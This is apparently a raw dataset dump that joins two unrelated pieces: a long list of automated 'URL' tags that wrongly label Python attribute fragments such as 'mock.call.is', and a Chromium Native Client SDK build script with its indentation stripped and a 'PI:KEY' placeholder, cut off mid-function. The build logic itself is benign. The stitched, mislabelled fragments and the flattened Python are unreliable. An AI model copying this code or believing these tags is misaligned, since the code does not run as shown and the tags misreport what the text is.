'mock.call.is'], ['URL', 'mock.call.de'], ['URL', 'mock.call.ma'], ['URL', 'mock.call.is'], ['URL', 'mock.call.is'], ['URL', 'mock.ca'], ['URL', 'mock.call.mk'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.de'], ['URL', 'utils.de'], ['URL', 'self.as'], ['URL', 'mock.mo'], ['URL', 'self.as'], ['URL', 'mock.pa'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'utils.de'], ['URL', 'mock.as'], ['URL', 'mock.pa'], ['URL', 'mock.ge'], ['URL', 'dev.re'], ['URL', 'mock.ge'], ['URL', 'mb.re'], ['URL', 'mock.is'], ['URL', 'device.re'], ['URL', 'mock.si'], ['URL', 'mock.ma'], ['URL', 'partitions.re'], ['URL', 'mock.call.ge'], ['URL', 'mock.call.ge'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.is'], ['URL', 'mock.call.de'], ['URL', 'mock.call.ma'], ['URL', 'mock.call.is'], ['URL', 'mock.call.is'], ['URL', 'mock.call.is'], ['URL', 'mock.call.mk'], ['URL', 'mock.ca'], ['URL', 'mock.call.mk'], ['URL', 'mock.ca'], ['URL', 'mock.call.de'], ['URL', 'utils.de'], ['URL', 'self.as'], ['URL', 'mock.mo'], ['URL', 'mock.as'], ['URL', 'mock.as'], ['URL', 'self.as'], ['URL', 'mock.ge'], ['URL', 'dev.re'], ['URL', 'mock.ge'], ['URL', 'mb.re'], ['URL', 'mock.is'], ['URL', 'device.re'], ['URL', 'uuid.re'], ['URL', 'mock.ma'], ['URL', 'partitions.re'], ['URL', 'mock.call.ge'], ['URL', 'mock.call.ge'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.is'], ['URL', 'mock.call.de'], ['URL', 'mock.call.ma'], ['URL', 'mock.call.is'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.de'], ['URL', 'utils.de'], ['URL', 'self.as'], ['URL', 'mock.mo'], ['URL', 'self.as'], ['URL', 'mock.ge'], ['URL', 'dev.re'], ['URL', 'mock.ge'], ['URL', 'mb.re'], ['URL', 'mock.is'], ['URL', 'device.re'], ['URL', 'uuid.re'], ['URL', 'mock.ma'], ['URL', 'partitions.re'], ['URL', 'mock.call.ge'], ['URL', 'mock.call.ge'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.is'], ['URL', 'mock.call.de'], ['URL', 'mock.call.ma'], ['URL', 'mock.call.is'], ['URL', 'mock.call.is'], ['URL', 'mock.call.is'], ['URL', 'mock.ca'], ['URL', 'mock.call.mk'], ['URL', 'mock.call.mk'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.de'], ['URL', 'utils.de'], ['URL', 'self.as'], ['URL', 'mock.mo'], ['URL', 'self.as'], ['URL', 'mock.ge'], ['URL', 'dev.re'], ['URL', 'mock.ge'], ['URL', 'mb.re'], ['URL', 'mock.is'], ['URL', 'device.re'], ['URL', 'uuid.re'], ['URL', 'mock.ma'], ['URL', 'partitions.re'], ['URL', 'uuid.re'], ['URL', 'mock.call.ge'], ['URL', 'mock.call.ge'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.is'], ['URL', 'mock.call.ma'], ['URL', 'mock.call.is'], ['URL', 'mock.call.is'], ['URL', 'mock.call.is'], ['URL', 'mock.ca'], ['URL', 'mock.call.mk'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.de'], ['URL', 'utils.de'], ['URL', 'self.as'], ['URL', 'mock.mo'], ['URL', 'self.as'], ['URL', 'mock.ge'], ['URL', 'size.ca'], ['URL', 'self.as'], ['URL', 'mock.pa'], ['URL', 'mock.ge'], ['URL', 'dev.re'], ['URL', 'mock.ge'], ['URL', 'mb.re'], ['URL', 'mock.is'], ['URL', 'device.re'], ['URL', 'uuid.re'], ['URL', 'mock.ma'], ['URL', 'partitions.re'], ['URL', 'configdrive.re'], ['URL', 'mock.call.ge'], ['URL', 'mock.call.ge'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.is'], ['URL', 'mock.call.de'], ['URL', 'mock.call.is'], ['URL', 'mock.call.is'], ['URL', 'mock.ca'], ['URL', 'mock.AN'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.de'], ['URL', 'utils.de'], ['URL', 'mock.ge'], ['URL', 'dev.re'], ['URL', 'mock.is'], ['URL', 'device.re'], ['URL', 'gdi.re'], ['URL', 'mock.call.ge'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.is'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.de'], ['URL', 'utils.de'], ['URL', 'self.as'], ['URL', 'mock.mo'], ['URL', 'self.as'], ['URL', 'mock.pa'], ['URL', 'exec.re'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'utils.ve'], ['URL', 'self.as'], ['URL', 'exec.ca'], ['URL', 'mock.pa'], ['URL', 'os.pa'], ['URL', 'os.re'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'utils.ch'], ['URL', 'self.as'], ['URL', 'os.ca'], ['URL', 'mock.pa'], ['URL', 'os.pa'], ['URL', 'os.re'], ['URL', 'utils.ch'], ['URL', 'os.as'], ['URL', 'mock.pa'], ['URL', 'exec.re'], ['URL', 'utils.ve'], ['URL', 'exec.as'], ['URL', 'mock.pa'], ['URL', 'utils.fo'], ['URL', 'exec.as'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'exec.re'], ['URL', 'exec.as'], ['URL', 'verify.as'], ['URL', 'update.as'], ['URL', 'dev.as'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'patcher.st'], ['URL', 'self.ad'], ['URL', 'patcher.st'], ['URL', 'mock.Ma'], ['URL', 'mock.at'], ['URL', 'mock.ge'], ['URL', 'dev.re'], ['URL', 'mock.ge'], ['URL', 'mb.re'], ['URL', 'disk.si'], ['URL', 'mock.call.ge'], ['URL', 'mock.call.ge'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.de'], ['URL', 'self.as'], ['URL', 'utils.de'], ['URL', 'self.as'], ['URL', 'mock.mo'], ['URL', 'tempfile.mk'], ['URL', 'os.cl'], ['URL', 'f.re'], ['URL', 'self.as'], ['URL', 'f.re'], ['URL', 'self.as'], ['URL', 'cfg.CONF.se'], ['URL', 'f.re'], ['URL', 'self.as'], ['URL', 'cfg.CONF.se'], ['URL', 'f.re'], ['URL', 'self.as'], ['URL', 'f.re'], ['URL', 'self.as'], ['URL', 'f.re'], ['URL', 'self.as'], ['URL', 'mock.pa'], ['URL', 'time.sl'], ['URL', 'utils.mo'], ['URL', 'self.no'], ['URL', 'utils.cr'], ['URL', 'self.co'], ['URL', 'utils.ge'], ['URL', 'self.as'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'blk.re'], ['URL', 'self.as'], ['URL', 'utils.is'], ['URL', 'blk.as'], ['URL', 'mock.pa'], ['URL', 'os.si'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'utils.is'], ['URL', 'os.as'], ['URL', 'mock.ca'], ['URL', 'mock.pa'], ['URL', 'os.pa'], ['URL', 'mock.pa'], ['URL', 'getsize.re'], ['URL', 'csize.re'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'getsize.re'], ['URL', 'csize.re'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'getsize.re'], ['URL', 'csize.re'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'getsize.re'], ['URL', 'csize.re'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'self.node.pro'], ['URL', 'utils.pa'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'self.node.pro'], ['URL', 'utils.pa'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'self.node.pro'], ['URL', 'utils.pa'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'self.node.pro'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'utils.pa'], ['URL', 'self.no'], ['URL', 'self.node.pro'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'utils.pa'], ['URL', 'self.no'], ['URL', 'mock.pa'], ['URL', 'self.im'], ['URL', 'self.ro'], ['URL', 'self.co'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.mo'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'obj.st'], ['URL', 'self.ad'], ['URL', 'self.mo'], ['URL', 'obj.st'], ['URL', 'self.mo'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'obj.st'], ['URL', 'self.ad'], ['URL', 'self.mo'], ['URL', 'obj.st'], ['URL', 'self.mo'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'obj.st'], ['URL', 'self.ad'], ['URL', 'self.mo'], ['URL', 'obj.st'], ['URL', 'self.mo'], ['URL', 'mp.re'], ['URL', 'self.ro'], ['URL', 'self.mo'], ['URL', 'ibd.re'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.im'], ['URL', 'self.mo'], ['URL', 'ibd.as'], ['URL', 'self.ro'], ['URL', 'self.mo'], ['URL', 'mp.as'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.co'], ['URL', 'self.mo'], ['URL', 'ibd.si'], ['URL', 'mock.ca'], ['URL', 'self.ro'], ['URL', 'mock.ca'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.im'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'ibd.ca'], ['URL', 'self.mo'], ['URL', 'mp.as'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.co'], ['URL', 'self.mo'], ['URL', 'mp.re'], ['URL', 'self.mo'], ['URL', 'ibd.si'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.im'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'ibd.ca'], ['URL', 'self.mo'], ['URL', 'mp.as'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.co'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'mp.re'], ['URL', 'self.mo'], ['URL', 'ibd.si'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.im'], ['URL', 'self.mo'], ['URL', 'mp.as'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.co'], ['URL', 'self.pa'], ['URL', 'self.de'], ['URL', 'exc.re'], ['URL', 'utils.ma'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.co'], ['URL', 'self.pa'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'exc.as'], ['URL', 'self.pa'], ['URL', 'exc.re'], ['URL', 'utils.ma'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.co'], ['URL', 'mock.ca'], ['URL', 'exc.as'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'self.de'], ['URL', 'self.no'], ['URL', 'gz.re'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'utils.de'], ['URL', 'self.de'], ['URL', 'self.no'], ['URL', 'exec.as'], ['URL', 'self.as'], ['URL', 'gz.ca'], ['URL', 'gz.si'], ['URL', 'processutils.Pro'], ['URL', 'mock.ca'], ['URL', 'self.as'], ['URL', 'processutils.Pro'], ['URL', 'utils.de'], ['URL', 'self.de'], ['URL', 'self.no'], ['URL', 'exec.as'], ['URL', 'exec.si'], ['URL', 'processutils.Pro'], ['URL', 'mock.ca'], ['URL', 'self.as'], ['URL', 'processutils.Pro'], ['URL', 'utils.de'], ['URL', 'self.de'], ['URL', 'self.no'], ['URL', 'exec.as'], ['URL', 'self.as'], ['URL', 'gz.ca'], ['URL', 'mock.pa'], ['URL', 'self.de'], ['URL', 'self.no'], ['URL', 'exec.re'], ['URL', 'mock.ca'], ['URL', 'self.de'], ['URL', 'utils.ge'], ['URL', 'self.de'], ['URL', 'exec.as'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'qinfo.re'], ['URL', 'mock.Pro'], ['URL', 'dd.as'], ['URL', 'self.as'], ['URL', 'cg.ca'], ['URL', 'qinfo.re'], ['URL', 'mock.Pro'], ['URL', 'cg.as'], ['URL', 'self.as'], ['URL', 'dd.ca'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'self.sk'], ['URL', 'self.fi'], ['URL', 'tempfile.Na'], ['URL', 'self.file.cl'], ['URL', 'self.file.na'], ['URL', 'mock.pa'], ['URL', 'self.file.na'], ['URL', 'partitioner.li'], ['URL', 'self.file.na'], ['URL', 'self.as'], ['URL', 'self.file.na'], ['URL', 'partitioner.li'], ['URL', 'self.file.na'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'mock.pa'], ['URL', 'mock.Ma'], ['URL', 'caches.as'], ['URL', 'image.as'], ['URL', 'mock.pa'], ['URL', 'exception.In'], ['URL', 'mock.Ma'], ['URL', 'caches.si'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'caches.as'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'requests.re'], ['URL', 'mock.Ma'], ['URL', 'requests.as'], ['URL', 'gzip.as'], ['URL', 'mock.AN'], ['URL', 'copy.as'], ['URL', 'mock.AN'], ['URL', 'mock.AN'], ['URL', 'mock.pa'], ['URL', 'self.as'], ['URL', 'requests.ca'], ['URL', 'gzip.as'], ['URL', 'mock.AN'], ['URL', 'copy.as'], ['URL', 'mock.AN'], ['URL', 'mock.AN'], ['URL', 'requests.exceptions.Re'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'self.as'], ['URL', 'copy.ca'], ['URL', 'mock.pa'], ['URL', 'b64.si'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'b64.as'], ['URL', 'self.as'], ['URL', 'copy.ca'], ['URL', 'mock.pa'], ['URL', 'requests.re'], ['URL', 'mock.Ma'], ['URL', 'copy.si'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'requests.as'], ['URL', 'gzip.as'], ['URL', 'mock.AN'], ['URL', 'copy.as'], ['URL', 'mock.AN'], ['URL', 'mock.AN'], ['URL', 'utils.mo'], ['URL', 'utils.ge'], ['URL', 'self.no'], ['URL', 'utils.cr'], ['URL', 'self.co'], ['URL', 'utils.cr'], ['URL', 'self.co'], ['URL', 'self.node.id'], ['URL', 'uuidutils.ge'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'utils.ge'], ['URL', 'self.as'], ['URL', 'self.no'], ['URL', 'utils.ge'], ['URL', 'self.co'], ['URL', 'self.node.in'], ['URL', 'utils.pa'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'self.node.in'], ['URL', 'utils.pa'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'self.node.in'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'utils.pa'], ['URL', 'self.no'], ['URL', 'self.node.in'], ['URL', 'self.as'], ['URL', 'utils.is'], ['URL', 'self.no'], ['URL', 'self.node.in'], ['URL', 'self.as'], ['URL', 'utils.is'], ['URL', 'self.no'], ['URL', 'self.node.in'], ['URL', 'self.as'], ['URL', 'utils.is'], ['URL', 'self.no'], ['URL', 'self.node.pro'], ['URL', 'utils.ge'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'self.node.in'], ['URL', 'utils.ge'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'self.node.in'], ['URL', 'utils.ge'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'utils.mo'], ['URL', 'self.no'], ['URL', 'utils.cr'], ['URL', 'self.co'], ['URL', 'mock.pa'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'utils.tr'], ['URL', 'mock.as'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'self.node.pro'], ['URL', 'self.node.sa'], ['URL', 'mock.si'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'utils.tr'], ['URL', 'mock.as'], ['URL', 'mock.warning.as'], ['URL', 'mock.AN'], ['URL', 'mock.pa'], ['URL', 'mock.si'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'utils.tr'], ['URL', 'mock.as'], ['URL', 'mock.pa'], ['URL', 'exception.Il'], ['URL', 'mock.si'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'exception.Il'], ['URL', 'utils.tr'], ['URL', 'mock.as'], ['URL', 'utils.mo'], ['URL', 'utils.cr'], ['URL', 'self.co'], ['URL', 'self.node.id'], ['URL', 'self.cl'], ['URL', 'mock.pa'], ['URL', 'ironic.objects.Port.li'], ['URL', 'mock.pa'], ['URL', 'client.Ag'], ['URL', 'mock.re'], ['URL', 'self.cl'], ['URL', 'mock.re'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'utils.ag'], ['URL', 'mock.as'], ['URL', 'mock.AN'], ['URL', 'task.no'], ['URL', 'self.as'], ['URL', 'task.no'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.cl'], ['URL', 'self.as'], ['URL', 'self.cl'], ['URL', 'mock.pa'], ['URL', 'ironic.objects.Port.li'], ['URL', 'mock.pa'], ['URL', 'client.Ag'], ['URL', 'self.cl'], ['URL', 'mock.re'], ['URL', 'self.cl'], ['URL', 'mock.re'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'exception.No'], ['URL', 'utils.ag'], ['URL', 'mock.as'], ['URL', 'mock.AN'], ['URL', 'task.no'], ['URL', 'mock.pa'], ['URL', 'ironic.objects.Port.li'], ['URL', 'mock.pa'], ['URL', 'client.Ag'], ['URL', 'mock.re'], ['URL', 'mock.re'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'utils.ag'], ['URL', 'self.cl'], ['URL', 'self.as'], ['URL', 'states.CL'], ['URL', 'mock.pa'], ['URL', 'ironic.objects.Port.li'], ['URL', 'mock.pa'], ['URL', 'client.Ag'], ['URL', 'mock.re'], ['URL', 'mock.re'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'utils.ag'], ['URL', 'self.cl'], ['URL', 'self.as'], ['URL', 'states.CL'], ['URL', 'mock.pa'], ['URL', 'ironic.objects.Port.li'], ['URL', 'mock.pa'], ['URL', 'client.Ag'], ['URL', 'mock.re'], ['URL', 'mock.re'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'utils.ag'], ['URL', 'self.cl'], ['URL', 'self.as'], ['URL', 'states.CL'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'ibd.re'], ['URL', 'exception.In'], ['URL', 'self.as'], ['URL', 'ibd.as'], ['URL', 'ibd.re'], ['URL', 'self.as'], ['URL', 'ibd.as']] |
34 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Entry point for both build and try bots.
This script is invoked from XXX, usually without arguments
to package an SDK. It automatically determines whether
this SDK is for mac, win, linux.
The script inspects the following environment variables:
BUILDBOT_BUILDERNAME to determine whether the script is run locally
and whether it should upload an SDK to file storage (GSTORE)
"""
# pylint: disable=W0621
# std python includes
import argparse
import datetime
import glob
import os
import re
import sys
if sys.version_info < (2, 7, 0):
sys.stderr.write("python 2.7 or later is required run this script\n")
sys.exit(1)
# local includes
import buildbot_common
import build_projects
import build_updater
import build_version
import generate_notice
import manifest_util
import parse_dsc
import verify_filelist
from build_paths import SCRIPT_DIR, SDK_SRC_DIR, SRC_DIR, NACL_DIR, OUT_DIR
from build_paths import NACLPORTS_DIR, GSTORE, GONACL_APPENGINE_SRC_DIR
# Add SDK make tools scripts to the python path.
sys.path.append(os.path.join(SDK_SRC_DIR, 'tools'))
sys.path.append(os.path.join(NACL_DIR, 'build'))
import getos
import oshelpers
BUILD_DIR = os.path.join(NACL_DIR, 'build')
NACL_TOOLCHAIN_DIR = os.path.join(NACL_DIR, 'toolchain')
NACL_TOOLCHAINTARS_DIR = os.path.join(NACL_TOOLCHAIN_DIR, '.tars')
CYGTAR = os.path.join(BUILD_DIR, 'cygtar.py')
PKGVER = os.path.join(BUILD_DIR, 'package_version', 'package_version.py')
NACLPORTS_URL = 'https://chromium.googlesource.com/external/naclports.git'
NACLPORTS_REV = 'PI:KEY'
GYPBUILD_DIR = 'gypbuild'
options = None
# Map of: ToolchainName: (PackageName, SDKDir, arch).
TOOLCHAIN_PACKAGE_MAP = {
'arm_glibc': ('nacl_arm_glibc', '%(platform)s_arm_glibc', 'arm'),
'x86_glibc': ('nacl_x86_glibc', '%(platform)s_x86_glibc', 'x86'),
'pnacl': ('pnacl_newlib', '%(platform)s_pnacl', 'pnacl')
}
def GetToolchainDirName(tcname):
"""Return the directory name for a given toolchain"""
return TOOLCHAIN_PACKAGE_MAP[tcname][1] % {'platform': getos.GetPlatform()}
def GetToolchainDir(pepperdir, tcname):
"""Return the full path to a given toolchain within a given sdk root"""
return os.path.join(pepperdir, 'toolchain', GetToolchainDirName(tcname))
def GetToolchainLibc(tcname):
if tcname == 'pnacl':
return 'newlib'
for libc in ('glibc', 'newlib', 'host'):
if libc in tcname:
return libc
def GetToolchainNaClInclude(pepperdir, tcname, arch=None):
tcpath = GetToolchainDir(pepperdir, tcname)
if arch is None:
arch = TOOLCHAIN_PACKAGE_MAP[tcname][2]
if arch == 'x86':
return os.path.join(tcpath, 'x86_64-nacl', 'include')
elif arch == 'pnacl':
return os.path.join(tcpath, 'le32-nacl', 'include')
elif arch == 'arm':
return os.path.join(tcpath, 'arm-nacl', 'include')
else:
buildbot_common.ErrorExit('Unknown architecture: %s' % arch)
def GetConfigDir(arch):
if arch.endswith('x64') and getos.GetPlatform() == 'win':
return 'Release_x64'
else:
return 'Release'
def GetNinjaOutDir(arch):
return os.path.join(OUT_DIR, GYPBUILD_DIR + '-' + arch, GetConfigDir(arch))
def GetGypBuiltLib(tcname, arch):
if arch == 'ia32':
lib_suffix = '32'
elif arch == 'x64':
lib_suffix = '64'
elif arch == 'arm':
lib_suffix = 'arm'
else:
lib_suffix = ''
tcdir = 'tc_' + GetToolchainLibc(tcname)
if tcname == 'pnacl':
if arch is None:
lib_suffix = ''
tcdir = 'tc_pnacl_newlib'
arch = 'x64'
else:
arch = 'clang-' + arch
return os.path.join(GetNinjaOutDir(arch), 'gen', tcdir, 'lib' + lib_suffix)
def GetToolchainNaClLib(tcname, tcpath, arch):
if arch == 'ia32':
return os.path.join(tcpath, 'x86_64-nacl', 'lib32')
elif arch == 'x64':
return os.path.join(tcpath, 'x86_64-nacl', 'lib')
elif arch == 'arm':
return os.path.join(tcpath, 'arm-nacl', 'lib')
elif tcname == 'pnacl':
return os.path.join(tcpath, 'le32-nacl', 'lib')
def GetOutputToolchainLib(pepperdir, tcname, arch):
tcpath = os.path.join(pepperdir, 'toolchain', GetToolchainDirName(tcname))
return GetToolchainNaClLib(tcname, tcpath, arch)
def GetPNaClTranslatorLib(tcpath, arch):
if arch not in ['arm', 'x86-32', 'x86-64']:
buildbot_common.ErrorExit('Unknown architecture %s.' % arch)
return os.path.join(tcpath, 'translator', arch, 'lib')
def BuildStepDownloadToolchains(toolchains):
buildbot_common.BuildStep('Running package_version.py')
args = [sys.executable, PKGVER, '--mode', 'nacl_core_sdk']
args.extend(['sync', '--extract'])
buildbot_common.Run(args, cwd=NACL_DIR)
def BuildStepCleanPepperDirs(pepperdir, pepperdir_old):
buildbot_common.BuildStep('Clean Pepper Dirs')
dirs_to_remove = (
pepperdir,
pepperdir_old,
os.path.join(OUT_DIR, 'arm_trusted')
)
for dirname in dirs_to_remove:
if os.path.exists(dirname):
buildbot_common.RemoveDir(dirname)
buildbot_common.MakeDir(pepperdir)
def BuildStepMakePepperDirs(pepperdir, subdirs):
for subdir in subdirs:
buildbot_common.MakeDir(os.path.join(pepperdir, subdir))
TEXT_FILES = [
'AUTHORS',
'COPYING',
'LICENSE',
'README.Makefiles',
'getting_started/README',
]
def BuildStepCopyTextFiles(pepperdir, pepper_ver, chrome_revision,
nacl_revision):
buildbot_common.BuildStep('Add Text Files')
InstallFiles(SDK_SRC_DIR, pepperdir, TEXT_FILES)
# Replace a few placeholders in README
readme_text = open(os.path.join(SDK_SRC_DIR, 'README')).read()
readme_text = readme_text.replace('${VERSION}', pepper_ver)
readme_text = readme_text.replace('${CHROME_REVISION}', chrome_revision)
readme_text = readme_text.replace('${CHROME_COMMIT_POSITION}',
build_version.ChromeCommitPosition())
readme_text = readme_text.replace('${NACL_REVISION}', nacl_revision)
# Year/Month/Day Hour:Minute:Second
time_format = '%Y/%m/%d %H:%M:%S'
readme_text = readme_text.replace('${DATE}',
datetime.datetime.now().strftime(time_format))
open(os.path.join(pepperdir, 'README'), 'w').write(readme_text)
def BuildStepUntarToolchains(pepperdir, toolchains):
buildbot_common.BuildStep('Untar Toolchains')
platform = getos.GetPlatform()
build_platform = '%s_x86' % platform
tmpdir = os.path.join(OUT_DIR, 'tc_temp')
buildbot_common.RemoveDir(tmpdir)
buildbot_common.MakeDir(tmpdir)
# Create a list of extract packages tuples, the first part should be
# "$PACKAGE_TARGET/$PACKAGE". The second part should be the destination
# directory relative to pepperdir/toolchain.
extract_packages = []
for toolchain in toolchains:
toolchain_map = TOOLCHAIN_PACKAGE_MAP.get(toolchain, None)
if toolchain_map:
package_name, tcdir, _ = toolchain_map
package_tuple = (os.path.join(build_platform, package_name),
tcdir % {'platform': platform})
extract_packages.append(package_tuple)
# On linux we also want to extract the arm_trusted package which contains
# the ARM libraries we ship in support of sel_ldr_arm.
if platform == 'linux':
extract_packages.append((os.path.join(build_platform, 'arm_trusted'),
'arm_trusted'))
if extract_packages:
# Extract all of the packages into the temp directory.
package_names = [package_tuple[0] for package_tuple in extract_packages]
buildbot_common.Run([sys.executable, PKGVER,
'--packages', ','.join(package_names),
'--tar-dir', NACL_TOOLCHAINTARS_DIR,
'--dest-dir', tmpdir,
'extract'])
# Move all the packages we extracted to the correct destination.
for package_name, dest_dir in extract_packages:
full_src_dir = os.path.join(tmpdir, package_name)
full_dst_dir = os.path.join(pepperdir, 'toolchain', dest_dir)
buildbot_common.Move(full_src_dir, full_dst_dir)
# Cleanup the temporary directory we are no longer using.
buildbot_common.RemoveDir(tmpdir)
# List of toolchain headers to install.
# Source is relative to top of Chromium tree, destination is relative
# to the toolchain header directory.
NACL_HEADER_MAP = {
'newlib': [
('native_client/src/include/nacl/nacl_exception.h', 'nacl/'),
('native_client/src/include/nacl/nacl_minidump.h', 'nacl/'),
('native_client/src/untrusted/irt/irt.h', ''),
('native_client/src/untrusted/irt/irt_dev.h', ''),
('native_client/src/untrusted/irt/irt_extension.h', ''),
('native_client/src/untrusted/nacl/nacl_dyncode.h', 'nacl/'),
('native_client/src/untrusted/nacl/nacl_startup.h', 'nacl/'),
('native_client/src/untrusted/pthread/pthread.h', ''),
('native_client/src/untrusted/pthread/semaphore.h', ''),
('native_client/src/untrusted/valgrind/dynamic_annotations.h', 'nacl/'),
('ppapi/nacl_irt/public/irt_ppapi.h', ''),
],
'glibc': [
('native_client/src/include/nacl/nacl_exception.h', 'nacl/'),
('native_client/src/include/nacl/nacl_minidump.h', 'nacl/'),
('native_client/src/untrusted/irt/irt.h', ''),
('native_client/src/untrusted/irt/irt_dev.h', ''),
('native_client/src/untrusted/irt/irt_extension.h', ''),
('native_client/src/untrusted/nacl/nacl_dyncode.h', 'nacl/'),
('native_client/src/untrusted/nacl/nacl_startup.h', 'nacl/'),
('native_client/src/untrusted/valgrind/dynamic_annotations.h', 'nacl/'),
('ppapi/nacl_irt/public/irt_ppapi.h', ''),
],
}
def InstallFiles(src_root, dest_root, file_list):
"""Copy a set of files from src_root to dest_root according
to the given mapping. This allows files to be copied from
to a location in the destination tree that is different to the
location in the source tree.
If the destination mapping ends with a '/' then the destination
basename is inherited from the the source file.
Wildcards can be used in the source list but it is not recommended
as this can end up adding things to the SDK unintentionally.
"""
for file_spec in file_list:
# The list of files to install can be a simple list of
# strings or a list of pairs, where each pair corresponds
